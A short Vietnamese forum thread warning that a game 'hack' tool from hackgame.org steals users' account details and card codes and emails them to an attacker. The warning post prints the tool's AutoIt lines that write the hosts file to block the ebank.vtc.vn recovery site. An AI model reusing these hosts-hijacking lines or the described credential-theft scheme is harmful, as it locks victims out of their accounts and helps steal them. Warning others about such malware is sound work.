Phần mềm hữu ích với Internet
By fgg_fgg
#738426 Phần mềm hack trên hackgame.org yêu cầu người dùng điền thông tin tài khoản, mã thẻ sau đó:

+ Mã thẻ nó dùng thư viện IE tự động nạp thẻ vào tài khoản comejenyc.

+ Thông tin tài khoản nó sẽ gửi vào email: [email protected].

+ Không cho bạn truy cập vào ebank.vtc.vn để lấy lại tài khoản bằng cách ghi 3 dòng sau vào file host


FileWrite($file, @CRLF & “127.0.0.1 ebank.vtc.vn”)

FileWrite($file, @CRLF & “127.0.0.1 Bấm vào đây để đăng nhập và xem link!)

FileWrite($file, @CRLF & “127.0.0.1 Bấm vào đây để đăng nhập và xem link!)


Xem code và phân tích tại:
Bấm vào đây để đăng nhập và xem link!
By blue_vsii
By samactrang94
#738466 thằng nghĩ ra cái hack nãy chắc giỏi lập trình lắm đây, Cái autoit này lập trình cũng khá đơn giản . Đa số ứng dụng vào để cheat game là chính .
Kết nối đề xuất:
Learn Synonym
Advertisement